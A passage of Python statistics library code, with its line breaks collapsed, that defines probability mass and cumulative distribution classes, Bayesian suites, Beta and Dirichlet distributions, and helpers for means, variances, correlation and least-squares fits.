self.AddConstant(other) def AddPmf(self, other): """Computes the Pmf of the sum of values drawn from self and other. other: another Pmf returns: new Pmf """ pmf = Pmf() for v1, p1 in self.Items(): for v2, p2 in other.Items(): pmf.Incr(v1 + v2, p1 * p2) return pmf def AddConstant(self, other): """Computes the Pmf of the sum a constant and values from self. other: a number returns: new Pmf """ pmf = Pmf() for v1, p1 in self.Items(): pmf.Set(v1 + other, p1) return pmf def __sub__(self, other): """Computes the Pmf of the diff of values drawn from self and other. other: another Pmf returns: new Pmf """ try: return self.SubPmf(other) except AttributeError: return self.AddConstant(-other) def SubPmf(self, other): """Computes the Pmf of the diff of values drawn from self and other. other: another Pmf returns: new Pmf """ pmf = Pmf() for v1, p1 in self.Items(): for v2, p2 in other.Items(): pmf.Incr(v1 - v2, p1 * p2) return pmf def __mul__(self, other): """Computes the Pmf of the product of values drawn from self and other. other: another Pmf returns: new Pmf """ try: return self.MulPmf(other) except AttributeError: return self.MulConstant(other) def MulPmf(self, other): """Computes the Pmf of the diff of values drawn from self and other. other: another Pmf returns: new Pmf """ pmf = Pmf() for v1, p1 in self.Items(): for v2, p2 in other.Items(): pmf.Incr(v1 * v2, p1 * p2) return pmf def MulConstant(self, other): """Computes the Pmf of the product of a constant and values from self. other: a number returns: new Pmf """ pmf = Pmf() for v1, p1 in self.Items(): pmf.Set(v1 * other, p1) return pmf def __div__(self, other): """Computes the Pmf of the ratio of values drawn from self and other. other: another Pmf returns: new Pmf """ try: return self.DivPmf(other) except AttributeError: return self.MulConstant(1/other) __truediv__ = __div__ def DivPmf(self, other): """Computes the Pmf of the ratio of values drawn from self and other. other: another Pmf returns: new Pmf """ pmf = Pmf() for v1, p1 in self.Items(): for v2, p2 in other.Items(): pmf.Incr(v1 / v2, p1 * p2) return pmf def Max(self, k): """Computes the CDF of the maximum of k selections from this dist. k: int returns: new Cdf """ cdf = self.MakeCdf() return cdf.Max(k) class Joint(Pmf): """Represents a joint distribution. The values are sequences (usually tuples) """ def Marginal(self, i, label=None): """Gets the marginal distribution of the indicated variable. i: index of the variable we want Returns: Pmf """ pmf = Pmf(label=label) for vs, prob in self.Items(): pmf.Incr(vs[i], prob) return pmf def Conditional(self, i, j, val, label=None): """Gets the conditional distribution of the indicated variable. Distribution of vs[i], conditioned on vs[j] = val. i: index of the variable we want j: which variable is conditioned on val: the value the jth variable has to have Returns: Pmf """ pmf = Pmf(label=label) for vs, prob in self.Items(): if vs[j] != val: continue pmf.Incr(vs[i], prob) pmf.Normalize() return pmf def MaxLikeInterval(self, percentage=90): """Returns the maximum-likelihood credible interval. If percentage=90, computes a 90% CI containing the values with the highest likelihoods. percentage: float between 0 and 100 Returns: list of values from the suite """ interval = [] total = 0 t = [(prob, val) for val, prob in self.Items()] t.sort(reverse=True) for prob, val in t: interval.append(val) total += prob if total >= percentage / 100.0: break return interval def MakeJoint(pmf1, pmf2): """Joint distribution of values from pmf1 and pmf2. Assumes that the PMFs represent independent random variables. Args: pmf1: Pmf object pmf2: Pmf object Returns: Joint pmf of value pairs """ joint = Joint() for v1, p1 in pmf1.Items(): for v2, p2 in pmf2.Items(): joint.Set((v1, v2), p1 * p2) return joint def MakeHistFromList(t, label=None): """Makes a histogram from an unsorted sequence of values. Args: t: sequence of numbers label: string label for this histogram Returns: Hist object """ return Hist(t, label=label) def MakeHistFromDict(d, label=None): """Makes a histogram from a map from values to frequencies. Args: d: dictionary that maps values to frequencies label: string label for this histogram Returns: Hist object """ return Hist(d, label) def MakePmfFromList(t, label=None): """Makes a PMF from an unsorted sequence of values. Args: t: sequence of numbers label: string label for this PMF Returns: Pmf object """ return Pmf(t, label=label) def MakePmfFromDict(d, label=None): """Makes a PMF from a map from values to probabilities. Args: d: dictionary that maps values to probabilities label: string label for this PMF Returns: Pmf object """ return Pmf(d, label=label) def MakePmfFromItems(t, label=None): """Makes a PMF from a sequence of value-probability pairs Args: t: sequence of value-probability pairs label: string label for this PMF Returns: Pmf object """ return Pmf(dict(t), label=label) def MakePmfFromHist(hist, label=None): """Makes a normalized PMF from a Hist object. Args: hist: Hist object label: string label Returns: Pmf object """ if label is None: label = hist.label return Pmf(hist, label=label) def MakeMixture(metapmf, label='mix'): """Make a mixture distribution. Args: metapmf: Pmf that maps from Pmfs to probs. label: string label for the new Pmf. Returns: Pmf object. """ mix = Pmf(label=label) for pmf, p1 in metapmf.Items(): for x, p2 in pmf.Items(): mix.Incr(x, p1 * p2) return mix def MakeUniformPmf(low, high, n): """Make a uniform Pmf. low: lowest value (inclusive) high: highest value (inclusize) n: number of values """ pmf = Pmf() for x in np.linspace(low, high, n): pmf.Set(x, 1) pmf.Normalize() return pmf class Cdf(object): """Represents a cumulative distribution function. Attributes: xs: sequence of values ps: sequence of probabilities label: string used as a graph label. """ def __init__(self, obj=None, ps=None, label=None): """Initializes. If ps is provided, obj must be the corresponding list of values. obj: Hist, Pmf, Cdf, Pdf, dict, pandas Series, list of pairs ps: list of cumulative probabilities label: string label """ self.label = label if label is not None else '_nolegend_' if isinstance(obj, (_DictWrapper, Cdf, Pdf)): if not label: self.label = label if label is not None else obj.label if obj is None: # caller does not provide obj, make an empty Cdf self.xs = np.asarray([]) self.ps = np.asarray([]) if ps is not None: logging.warning("Cdf: can't pass ps without also passing xs.") return else: # if the caller provides xs and ps, just store them if ps is not None: if isinstance(ps, str): logging.warning("Cdf: ps can't be a string") self.xs = np.asarray(obj) self.ps = np.asarray(ps) return # caller has provided just obj, not ps if isinstance(obj, Cdf): self.xs = copy.copy(obj.xs) self.ps = copy.copy(obj.ps) return if isinstance(obj, _DictWrapper): dw = obj else: dw = Hist(obj) if len(dw) == 0: self.xs = np.asarray([]) self.ps = np.asarray([]) return xs, freqs = zip(*sorted(dw.Items())) self.xs = np.asarray(xs) self.ps = np.cumsum(freqs, dtype=np.float) self.ps /= self.ps[-1] def __str__(self): return 'Cdf(%s, %s)' % (str(self.xs), str(self.ps)) __repr__ = __str__ def __len__(self): return len(self.xs) def __getitem__(self, x): return self.Prob(x) def __setitem__(self): raise UnimplementedMethodException() def __delitem__(self): raise UnimplementedMethodException() def __eq__(self, other): return np.all(self.xs == other.xs) and np.all(self.ps == other.ps) def Copy(self, label=None): """Returns a copy of this Cdf. label: string label for the new Cdf """ if label is None: label = self.label return Cdf(list(self.xs), list(self.ps), label=label) def MakePmf(self, label=None): """Makes a Pmf.""" if label is None: label = self.label return Pmf(self, label=label) def Values(self): """Returns a sorted list of values. """ return self.xs def Items(self): """Returns a sorted sequence of (value, probability) pairs. Note: in Python3, returns an iterator. """ a = self.ps b = np.roll(a, 1) b[0] = 0 return zip(self.xs, a-b) def Shift(self, term): """Adds a term to the xs. term: how much to add """ new = self.Copy() # don't use +=, or else an int array + float yields int array new.xs = new.xs + term return new def Scale(self, factor): """Multiplies the xs by a factor. factor: what to multiply by """ new = self.Copy() # don't use *=, or else an int array * float yields int array new.xs = new.xs * factor return new def Prob(self, x): """Returns CDF(x), the probability that corresponds to value x. Args: x: number Returns: float probability """ if x < self.xs[0]: return 0.0 index = bisect.bisect(self.xs, x) p = self.ps[index-1] return p def Probs(self, xs): """Gets probabilities for a sequence of values. xs: any sequence that can be converted to NumPy array returns: NumPy array of cumulative probabilities """ xs = np.asarray(xs) index = np.searchsorted(self.xs, xs, side='right') ps = self.ps[index-1] ps[xs < self.xs[0]] = 0.0 return ps ProbArray = Probs def Value(self, p): """Returns InverseCDF(p), the value that corresponds to probability p. Args: p: number in the range [0, 1] Returns: number value """ if p < 0 or p > 1: raise ValueError('Probability p must be in range [0, 1]') index = bisect.bisect_left(self.ps, p) return self.xs[index] def ValueArray(self, ps): """Returns InverseCDF(p), the value that corresponds to probability p. Args: ps: NumPy array of numbers in the range [0, 1] Returns: NumPy array of values """ ps = np.asarray(ps) if np.any(ps < 0) or np.any(ps > 1): raise ValueError('Probability p must be in range [0, 1]') index = np.searchsorted(self.ps, ps, side='left') return self.xs[index] def Percentile(self, p): """Returns the value that corresponds to percentile p. Args: p: number in the range [0, 100] Returns: number value """ return self.Value(p / 100.0) def PercentileRank(self, x): """Returns the percentile rank of the value x. x: potential value in the CDF returns: percentile rank in the range 0 to 100 """ return self.Prob(x) * 100.0 def Random(self): """Chooses a random value from this distribution.""" return self.Value(random.random()) def Sample(self, n): """Generates a random sample from this distribution. n: int length of the sample returns: NumPy array """ ps = np.random.random(n) return self.ValueArray(ps) def Mean(self): """Computes the mean of a CDF. Returns: float mean """ old_p = 0 total = 0.0 for x, new_p in zip(self.xs, self.ps): p = new_p - old_p total += p * x old_p = new_p return total def CredibleInterval(self, percentage=90): """Computes the central credible interval. If percentage=90, computes the 90% CI. Args: percentage: float between 0 and 100 Returns: sequence of two floats, low and high """ prob = (1 - percentage / 100.0) / 2 interval = self.Value(prob), self.Value(1 - prob) return interval ConfidenceInterval = CredibleInterval def _Round(self, multiplier=1000.0): """ An entry is added to the cdf only if the percentile differs from the previous value in a significant digit, where the number of significant digits is determined by multiplier. The default is 1000, which keeps log10(1000) = 3 significant digits. """ # TODO(write this method) raise UnimplementedMethodException() def Render(self, **options): """Generates a sequence of points suitable for plotting. An empirical CDF is a step function; linear interpolation can be misleading. Note: options are ignored Returns: tuple of (xs, ps) """ def interleave(a, b): c = np.empty(a.shape[0] + b.shape[0]) c[::2] = a c[1::2] = b return c a = np.array(self.xs) xs = interleave(a, a) shift_ps = np.roll(self.ps, 1) shift_ps[0] = 0 ps = interleave(shift_ps, self.ps) return xs, ps def Max(self, k): """Computes the CDF of the maximum of k selections from this dist. k: int returns: new Cdf """ cdf = self.Copy() cdf.ps **= k return cdf def MakeCdfFromItems(items, label=None): """Makes a cdf from an unsorted sequence of (value, frequency) pairs. Args: items: unsorted sequence of (value, frequency) pairs label: string label for this CDF Returns: cdf: list of (value, fraction) pairs """ return Cdf(dict(items), label=label) def MakeCdfFromDict(d, label=None): """Makes a CDF from a dictionary that maps values to frequencies. Args: d: dictionary that maps values to frequencies. label: string label for the data. Returns: Cdf object """ return Cdf(d, label=label) def MakeCdfFromList(seq, label=None): """Creates a CDF from an unsorted sequence. Args: seq: unsorted sequence of sortable values label: string label for the cdf Returns: Cdf object """ return Cdf(seq, label=label) def MakeCdfFromHist(hist, label=None): """Makes a CDF from a Hist object. Args: hist: Pmf.Hist object label: string label for the data. Returns: Cdf object """ if label is None: label = hist.label return Cdf(hist, label=label) def MakeCdfFromPmf(pmf, label=None): """Makes a CDF from a Pmf object. Args: pmf: Pmf.Pmf object label: string label for the data. Returns: Cdf object """ if label is None: label = pmf.label return Cdf(pmf, label=label) class UnimplementedMethodException(Exception): """Exception if someone calls a method that should be overridden.""" class Suite(Pmf): """Represents a suite of hypotheses and their probabilities.""" def Update(self, data): """Updates each hypothesis based on the data. data: any representation of the data returns: the normalizing constant """ for hypo in self.Values(): like = self.Likelihood(data, hypo) self.Mult(hypo, like) return self.Normalize() def LogUpdate(self, data): """Updates a suite of hypotheses based on new data. Modifies the suite directly; if you want to keep the original, make a copy. Note: unlike Update, LogUpdate does not normalize. Args: data: any representation of the data """ for hypo in self.Values(): like = self.LogLikelihood(data, hypo) self.Incr(hypo, like) def UpdateSet(self, dataset): """Updates each hypothesis based on the dataset. This is more efficient than calling Update repeatedly because it waits until the end to Normalize. Modifies the suite directly; if you want to keep the original, make a copy. dataset: a sequence of data returns: the normalizing constant """ for data in dataset: for hypo in self.Values(): like = self.Likelihood(data, hypo) self.Mult(hypo, like) return self.Normalize() def LogUpdateSet(self, dataset): """Updates each hypothesis based on the dataset. Modifies the suite directly; if you want to keep the original, make a copy. dataset: a sequence of data returns: None """ for data in dataset: self.LogUpdate(data) def Likelihood(self, data, hypo): """Computes the likelihood of the data under the hypothesis. hypo: some representation of the hypothesis data: some representation of the data """ raise UnimplementedMethodException() def LogLikelihood(self, data, hypo): """Computes the log likelihood of the data under the hypothesis. hypo: some representation of the hypothesis data: some representation of the data """ raise UnimplementedMethodException() def Print(self): """Prints the hypotheses and their probabilities.""" for hypo, prob in sorted(self.Items()): print(hypo, prob) def MakeOdds(self): """Transforms from probabilities to odds. Values with prob=0 are removed. """ for hypo, prob in self.Items(): if prob: self.Set(hypo, Odds(prob)) else: self.Remove(hypo) def MakeProbs(self): """Transforms from odds to probabilities.""" for hypo, odds in self.Items(): self.Set(hypo, Probability(odds)) def MakeSuiteFromList(t, label=None): """Makes a suite from an unsorted sequence of values. Args: t: sequence of numbers label: string label for this suite Returns: Suite object """ hist = MakeHistFromList(t, label=label) d = hist.GetDict() return MakeSuiteFromDict(d) def MakeSuiteFromHist(hist, label=None): """Makes a normalized suite from a Hist object. Args: hist: Hist object label: string label Returns: Suite object """ if label is None: label = hist.label # make a copy of the dictionary d = dict(hist.GetDict()) return MakeSuiteFromDict(d, label) def MakeSuiteFromDict(d, label=None): """Makes a suite from a map from values to probabilities. Args: d: dictionary that maps values to probabilities label: string label for this suite Returns: Suite object """ suite = Suite(label=label) suite.SetDict(d) suite.Normalize() return suite class Pdf(object): """Represents a probability density function (PDF).""" def Density(self, x): """Evaluates this Pdf at x. Returns: float or NumPy array of probability density """ raise UnimplementedMethodException() def GetLinspace(self): """Get a linspace for plotting. Not all subclasses of Pdf implement this. Returns: numpy array """ raise UnimplementedMethodException() def MakePmf(self, **options): """Makes a discrete version of this Pdf. options can include label: string low: low end of range high: high end of range n: number of places to evaluate Returns: new Pmf """ label = options.pop('label', '') xs, ds = self.Render(**options) return Pmf(dict(zip(xs, ds)), label=label) def Render(self, **options): """Generates a sequence of points suitable for plotting. If options includes low and high, it must also include n; in that case the density is evaluated an n locations between low and high, including both. If options includes xs, the density is evaluate at those location. Otherwise, self.GetLinspace is invoked to provide the locations. Returns: tuple of (xs, densities) """ low, high = options.pop('low', None), options.pop('high', None) if low is not None and high is not None: n = options.pop('n', 101) xs = np.linspace(low, high, n) else: xs = options.pop('xs', None) if xs is None: xs = self.GetLinspace() ds = self.Density(xs) return xs, ds def Items(self): """Generates a sequence of (value, probability) pairs. """ return zip(*self.Render()) class NormalPdf(Pdf): """Represents the PDF of a Normal distribution.""" def __init__(self, mu=0, sigma=1, label=None): """Constructs a Normal Pdf with given mu and sigma. mu: mean sigma: standard deviation label: string """ self.mu = mu self.sigma = sigma self.label = label if label is not None else '_nolegend_' def __str__(self): return 'NormalPdf(%f, %f)' % (self.mu, self.sigma) def GetLinspace(self): """Get a linspace for plotting. Returns: numpy array """ low, high = self.mu-3*self.sigma, self.mu+3*self.sigma return np.linspace(low, high, 101) def Density(self, xs): """Evaluates this Pdf at xs. xs: scalar or sequence of floats returns: float or NumPy array of probability density """ return stats.norm.pdf(xs, self.mu, self.sigma) class ExponentialPdf(Pdf): """Represents the PDF of an exponential distribution.""" def __init__(self, lam=1, label=None): """Constructs an exponential Pdf with given parameter. lam: rate parameter label: string """ self.lam = lam self.label = label if label is not None else '_nolegend_' def __str__(self): return 'ExponentialPdf(%f)' % (self.lam) def GetLinspace(self): """Get a linspace for plotting. Returns: numpy array """ low, high = 0, 5.0/self.lam return np.linspace(low, high, 101) def Density(self, xs): """Evaluates this Pdf at xs. xs: scalar or sequence of floats returns: float or NumPy array of probability density """ return stats.expon.pdf(xs, scale=1.0/self.lam) class EstimatedPdf(Pdf): """Represents a PDF estimated by KDE.""" def __init__(self, sample, label=None): """Estimates the density function based on a sample. sample: sequence of data label: string """ self.label = label if label is not None else '_nolegend_' self.kde = stats.gaussian_kde(sample) low = min(sample) high = max(sample) self.linspace = np.linspace(low, high, 101) def __str__(self): return 'EstimatedPdf(label=%s)' % str(self.label) def GetLinspace(self): """Get a linspace for plotting. Returns: numpy array """ return self.linspace def Density(self, xs): """Evaluates this Pdf at xs. returns: float or NumPy array of probability density """ return self.kde.evaluate(xs) def CredibleInterval(pmf, percentage=90): """Computes a credible interval for a given distribution. If percentage=90, computes the 90% CI. Args: pmf: Pmf object representing a posterior distribution percentage: float between 0 and 100 Returns: sequence of two floats, low and high """ cdf = pmf.MakeCdf() prob = (1 - percentage / 100.0) / 2 interval = cdf.Value(prob), cdf.Value(1 - prob) return interval def PmfProbLess(pmf1, pmf2): """Probability that a value from pmf1 is less than a value from pmf2. Args: pmf1: Pmf object pmf2: Pmf object Returns: float probability """ total = 0.0 for v1, p1 in pmf1.Items(): for v2, p2 in pmf2.Items(): if v1 < v2: total += p1 * p2 return total def PmfProbGreater(pmf1, pmf2): """Probability that a value from pmf1 is less than a value from pmf2. Args: pmf1: Pmf object pmf2: Pmf object Returns: float probability """ total = 0.0 for v1, p1 in pmf1.Items(): for v2, p2 in pmf2.Items(): if v1 > v2: total += p1 * p2 return total def PmfProbEqual(pmf1, pmf2): """Probability that a value from pmf1 equals a value from pmf2. Args: pmf1: Pmf object pmf2: Pmf object Returns: float probability """ total = 0.0 for v1, p1 in pmf1.Items(): for v2, p2 in pmf2.Items(): if v1 == v2: total += p1 * p2 return total def RandomSum(dists): """Chooses a random value from each dist and returns the sum. dists: sequence of Pmf or Cdf objects returns: numerical sum """ total = sum(dist.Random() for dist in dists) return total def SampleSum(dists, n): """Draws a sample of sums from a list of distributions. dists: sequence of Pmf or Cdf objects n: sample size returns: new Pmf of sums """ pmf = Pmf(RandomSum(dists) for i in range(n)) return pmf def EvalNormalPdf(x, mu, sigma): """Computes the unnormalized PDF of the normal distribution. x: value mu: mean sigma: standard deviation returns: float probability density """ return stats.norm.pdf(x, mu, sigma) def MakeNormalPmf(mu, sigma, num_sigmas, n=201): """Makes a PMF discrete approx to a Normal distribution. mu: float mean sigma: float standard deviation num_sigmas: how many sigmas to extend in each direction n: number of values in the Pmf returns: normalized Pmf """ pmf = Pmf() low = mu - num_sigmas * sigma high = mu + num_sigmas * sigma for x in np.linspace(low, high, n): p = EvalNormalPdf(x, mu, sigma) pmf.Set(x, p) pmf.Normalize() return pmf def EvalBinomialPmf(k, n, p): """Evaluates the binomial PMF. Returns the probabily of k successes in n trials with probability p. """ return stats.binom.pmf(k, n, p) def EvalHypergeomPmf(k, N, K, n): """Evaluates the hypergeometric PMF. Returns the probabily of k successes in n trials from a population N with K successes in it. """ return stats.hypergeom.pmf(k, N, K, n) def EvalPoissonPmf(k, lam): """Computes the Poisson PMF. k: number of events lam: parameter lambda in events per unit time returns: float probability """ # don't use the scipy function (yet). for lam=0 it returns NaN; # should be 0.0 # return stats.poisson.pmf(k, lam) return lam ** k * math.exp(-lam) / special.gamma(k+1) def MakePoissonPmf(lam, high, step=1): """Makes a PMF discrete approx to a Poisson distribution. lam: parameter lambda in events per unit time high: upper bound of the Pmf returns: normalized Pmf """ pmf = Pmf() for k in range(0, high + 1, step): p = EvalPoissonPmf(k, lam) pmf.Set(k, p) pmf.Normalize() return pmf def EvalExponentialPdf(x, lam): """Computes the exponential PDF. x: value lam: parameter lambda in events per unit time returns: float probability density """ return lam * math.exp(-lam * x) def EvalExponentialCdf(x, lam): """Evaluates CDF of the exponential distribution with parameter lam.""" return 1 - math.exp(-lam * x) def MakeExponentialPmf(lam, high, n=200): """Makes a PMF discrete approx to an exponential distribution. lam: parameter lambda in events per unit time high: upper bound n: number of values in the Pmf returns: normalized Pmf """ pmf = Pmf() for x in np.linspace(0, high, n): p = EvalExponentialPdf(x, lam) pmf.Set(x, p) pmf.Normalize() return pmf def StandardNormalCdf(x): """Evaluates the CDF of the standard Normal distribution. See http://en.wikipedia.org/wiki/Normal_distribution #Cumulative_distribution_function Args: x: float Returns: float """ return (math.erf(x / ROOT2) + 1) / 2 def EvalNormalCdf(x, mu=0, sigma=1): """Evaluates the CDF of the normal distribution. Args: x: float mu: mean parameter sigma: standard deviation parameter Returns: float """ return stats.norm.cdf(x, loc=mu, scale=sigma) def EvalNormalCdfInverse(p, mu=0, sigma=1): """Evaluates the inverse CDF of the normal distribution. See http://en.wikipedia.org/wiki/Normal_distribution#Quantile_function Args: p: float mu: mean parameter sigma: standard deviation parameter Returns: float """ return stats.norm.ppf(p, loc=mu, scale=sigma) def EvalLognormalCdf(x, mu=0, sigma=1): """Evaluates the CDF of the lognormal distribution. x: float or sequence mu: mean parameter sigma: standard deviation parameter Returns: float or sequence """ return stats.lognorm.cdf(x, loc=mu, scale=sigma) def RenderExpoCdf(lam, low, high, n=101): """Generates sequences of xs and ps for an exponential CDF. lam: parameter low: float high: float n: number of points to render returns: numpy arrays (xs, ps) """ xs = np.linspace(low, high, n) ps = 1 - np.exp(-lam * xs) #ps = stats.expon.cdf(xs, scale=1.0/lam) return xs, ps def RenderNormalCdf(mu, sigma, low, high, n=101): """Generates sequences of xs and ps for a Normal CDF. mu: parameter sigma: parameter low: float high: float n: number of points to render returns: numpy arrays (xs, ps) """ xs = np.linspace(low, high, n) ps = stats.norm.cdf(xs, mu, sigma) return xs, ps def RenderParetoCdf(xmin, alpha, low, high, n=50): """Generates sequences of xs and ps for a Pareto CDF. xmin: parameter alpha: parameter low: float high: float n: number of points to render returns: numpy arrays (xs, ps) """ if low < xmin: low = xmin xs = np.linspace(low, high, n) ps = 1 - (xs / xmin) ** -alpha #ps = stats.pareto.cdf(xs, scale=xmin, b=alpha) return xs, ps class Beta(object): """Represents a Beta distribution. See http://en.wikipedia.org/wiki/Beta_distribution """ def __init__(self, alpha=1, beta=1, label=None): """Initializes a Beta distribution.""" self.alpha = alpha self.beta = beta self.label = label if label is not None else '_nolegend_' def Update(self, data): """Updates a Beta distribution. data: pair of int (heads, tails) """ heads, tails = data self.alpha += heads self.beta += tails def Mean(self): """Computes the mean of this distribution.""" return self.alpha / (self.alpha + self.beta) def Random(self): """Generates a random variate from this distribution.""" return random.betavariate(self.alpha, self.beta) def Sample(self, n): """Generates a random sample from this distribution. n: int sample size """ size = n, return np.random.beta(self.alpha, self.beta, size) def EvalPdf(self, x): """Evaluates the PDF at x.""" return x ** (self.alpha - 1) * (1 - x) ** (self.beta - 1) def MakePmf(self, steps=101, label=None): """Returns a Pmf of this distribution. Note: Normally, we just evaluate the PDF at a sequence of points and treat the probability density as a probability mass. But if alpha or beta is less than one, we have to be more careful because the PDF goes to infinity at x=0 and x=1. In that case we evaluate the CDF and compute differences. """ if self.alpha < 1 or self.beta < 1: cdf = self.MakeCdf() pmf = cdf.MakePmf() return pmf xs = [i / (steps - 1.0) for i in range(steps)] probs = [self.EvalPdf(x) for x in xs] pmf = Pmf(dict(zip(xs, probs)), label=label) return pmf def MakeCdf(self, steps=101): """Returns the CDF of this distribution.""" xs = [i / (steps - 1.0) for i in range(steps)] ps = [special.betainc(self.alpha, self.beta, x) for x in xs] cdf = Cdf(xs, ps) return cdf class Dirichlet(object): """Represents a Dirichlet distribution. See http://en.wikipedia.org/wiki/Dirichlet_distribution """ def __init__(self, n, conc=1, label=None): """Initializes a Dirichlet distribution. n: number of dimensions conc: concentration parameter (smaller yields more concentration) label: string label """ if n < 2: raise ValueError('A Dirichlet distribution with ' 'n<2 makes no sense') self.n = n self.params = np.ones(n, dtype=np.float) * conc self.label = label if label is not None else '_nolegend_' def Update(self, data): """Updates a Dirichlet distribution. data: sequence of observations, in order corresponding to params """ m = len(data) self.params[:m] += data def Random(self): """Generates a random variate from this distribution. Returns: normalized vector of fractions """ p = np.random.gamma(self.params) return p / p.sum() def Likelihood(self, data): """Computes the likelihood of the data. Selects a random vector of probabilities from this distribution. Returns: float probability """ m = len(data) if self.n < m: return 0 x = data p = self.Random() q = p[:m] ** x return q.prod() def LogLikelihood(self, data): """Computes the log likelihood of the data. Selects a random vector of probabilities from this distribution. Returns: float log probability """ m = len(data) if self.n < m: return float('-inf') x = self.Random() y = np.log(x[:m]) * data return y.sum() def MarginalBeta(self, i): """Computes the marginal distribution of the ith element. See http://en.wikipedia.org/wiki/Dirichlet_distribution #Marginal_distributions i: int Returns: Beta object """ alpha0 = self.params.sum() alpha = self.params[i] return Beta(alpha, alpha0 - alpha) def PredictivePmf(self, xs, label=None): """Makes a predictive distribution. xs: values to go into the Pmf Returns: Pmf that maps from x to the mean prevalence of x """ alpha0 = self.params.sum() ps = self.params / alpha0 return Pmf(zip(xs, ps), label=label) def BinomialCoef(n, k): """Compute the binomial coefficient "n choose k". n: number of trials k: number of successes Returns: float """ return scipy.misc.comb(n, k) def LogBinomialCoef(n, k): """Computes the log of the binomial coefficient. http://math.stackexchange.com/questions/64716/ approximating-the-logarithm-of-the-binomial-coefficient n: number of trials k: number of successes Returns: float """ return n * math.log(n) - k * math.log(k) - (n - k) * math.log(n - k) def NormalProbability(ys, jitter=0.0): """Generates data for a normal probability plot. ys: sequence of values jitter: float magnitude of jitter added to the ys returns: numpy arrays xs, ys """ n = len(ys) xs = np.random.normal(0, 1, n) xs.sort() if jitter: ys = Jitter(ys, jitter) else: ys = np.array(ys) ys.sort() return xs, ys def Jitter(values, jitter=0.5): """Jitters the values by adding a uniform variate in (-jitter, jitter). values: sequence jitter: scalar magnitude of jitter returns: new numpy array """ n = len(values) return np.random.uniform(-jitter, +jitter, n) + values def NormalProbabilityPlot(sample, fit_color='0.8', **options): """Makes a normal probability plot with a fitted line. sample: sequence of numbers fit_color: color string for the fitted line options: passed along to Plot """ xs, ys = NormalProbability(sample) mean, var = MeanVar(sample) std = math.sqrt(var) fit = FitLine(xs, mean, std) thinkplot.Plot(*fit, color=fit_color, label='model') xs, ys = NormalProbability(sample) thinkplot.Plot(xs, ys, **options) def Mean(xs): """Computes mean. xs: sequence of values returns: float mean """ return np.mean(xs) def Var(xs, mu=None, ddof=0): """Computes variance. xs: sequence of values mu: option known mean ddof: delta degrees of freedom returns: float """ xs = np.asarray(xs) if mu is None: mu = xs.mean() ds = xs - mu return np.dot(ds, ds) / (len(xs) - ddof) def Std(xs, mu=None, ddof=0): """Computes standard deviation. xs: sequence of values mu: option known mean ddof: delta degrees of freedom returns: float """ var = Var(xs, mu, ddof) return math.sqrt(var) def MeanVar(xs, ddof=0): """Computes mean and variance. Based on http://stackoverflow.com/questions/19391149/ numpy-mean-and-variance-from-single-function xs: sequence of values ddof: delta degrees of freedom returns: pair of float, mean and var """ xs = np.asarray(xs) mean = xs.mean() s2 = Var(xs, mean, ddof) return mean, s2 def Trim(t, p=0.01): """Trims the largest and smallest elements of t. Args: t: sequence of numbers p: fraction of values to trim off each end Returns: sequence of values """ n = int(p * len(t)) t = sorted(t)[n:-n] return t def TrimmedMean(t, p=0.01): """Computes the trimmed mean of a sequence of numbers. Args: t: sequence of numbers p: fraction of values to trim off each end Returns: float """ t = Trim(t, p) return Mean(t) def TrimmedMeanVar(t, p=0.01): """Computes the trimmed mean and variance of a sequence of numbers. Side effect: sorts the list. Args: t: sequence of numbers p: fraction of values to trim off each end Returns: float """ t = Trim(t, p) mu, var = MeanVar(t) return mu, var def CohenEffectSize(group1, group2): """Compute Cohen's d. group1: Series or NumPy array group2: Series or NumPy array returns: float """ diff = group1.mean() - group2.mean() n1, n2 = len(group1), len(group2) var1 = group1.var() var2 = group2.var() pooled_var = (n1 * var1 + n2 * var2) / (n1 + n2) d = diff / math.sqrt(pooled_var) return d def Cov(xs, ys, meanx=None, meany=None): """Computes Cov(X, Y). Args: xs: sequence of values ys: sequence of values meanx: optional float mean of xs meany: optional float mean of ys Returns: Cov(X, Y) """ xs = np.asarray(xs) ys = np.asarray(ys) if meanx is None: meanx = np.mean(xs) if meany is None: meany = np.mean(ys) cov = np.dot(xs-meanx, ys-meany) / len(xs) return cov def Corr(xs, ys): """Computes Corr(X, Y). Args: xs: sequence of values ys: sequence of values Returns: Corr(X, Y) """ xs = np.asarray(xs) ys = np.asarray(ys) meanx, varx = MeanVar(xs) meany, vary = MeanVar(ys) corr = Cov(xs, ys, meanx, meany) / math.sqrt(varx * vary) return corr def SerialCorr(series, lag=1): """Computes the serial correlation of a series. series: Series lag: integer number of intervals to shift returns: float correlation """ xs = series[lag:] ys = series.shift(lag)[lag:] corr = Corr(xs, ys) return corr def SpearmanCorr(xs, ys): """Computes Spearman's rank correlation. Args: xs: sequence of values ys: sequence of values Returns: float Spearman's correlation """ xranks = pandas.Series(xs).rank() yranks = pandas.Series(ys).rank() return Corr(xranks, yranks) def MapToRanks(t): """Returns a list of ranks corresponding to the elements in t. Args: t: sequence of numbers Returns: list of integer ranks, starting at 1 """ # pair up each value with its index pairs = enumerate(t) # sort by value sorted_pairs = sorted(pairs, key=itemgetter(1)) # pair up each pair with its rank ranked = enumerate(sorted_pairs) # sort by index resorted = sorted(ranked, key=lambda trip: trip[1][0]) # extract the ranks ranks = [trip[0]+1 for trip in resorted] return ranks def LeastSquares(xs, ys): """Computes a linear least squares fit for ys as a function of xs. Args: xs: sequence of values ys: sequence of values Returns: tuple of (intercept, slope) """ meanx, varx = MeanVar(xs) meany = Mean(ys) slope = Cov(xs, ys, meanx, meany) / varx inter = meany - slope * meanx return inter, slope def FitLine(xs, inter, slope): """Fits a line to the given data. xs: sequence of x returns: tuple of numpy arrays (sorted xs, fit ys) """ fit_xs = np.sort(xs) fit_ys = inter + slope * fit_xs return fit_xs, fit_ys def Residuals(xs, ys, inter, slope): """Computes residuals for a linear fit with parameters inter and slope. Args: xs: independent variable ys: dependent variable inter: float intercept slope: float slope Returns: list of residuals """ xs = np.asarray(xs) ys = np.asarray(ys) res = ys - (inter + slope * xs) return res def CoefDetermination(ys, res): """Computes the coefficient of determination (R^2) for given residuals. Args: ys: dependent variable res: residuals Returns: float coefficient of determination """ return 1 - Var(res) / Var(ys) def CorrelatedGenerator(rho): """Generates standard normal variates with serial correlation. rho: target coefficient of correlation Returns: iterable """ x = random.gauss(0, 1) yield x sigma = math.sqrt(1 - rho**2) while True: x = random.gauss(x * rho, sigma) yield x def CorrelatedNormalGenerator(mu, sigma, rho): """Generates normal variates with serial correlation. mu: mean of variate sigma: standard deviation of variate rho: target coefficient of correlation Returns: iterable """ for x in CorrelatedGenerator(rho): yield x * sigma + mu def 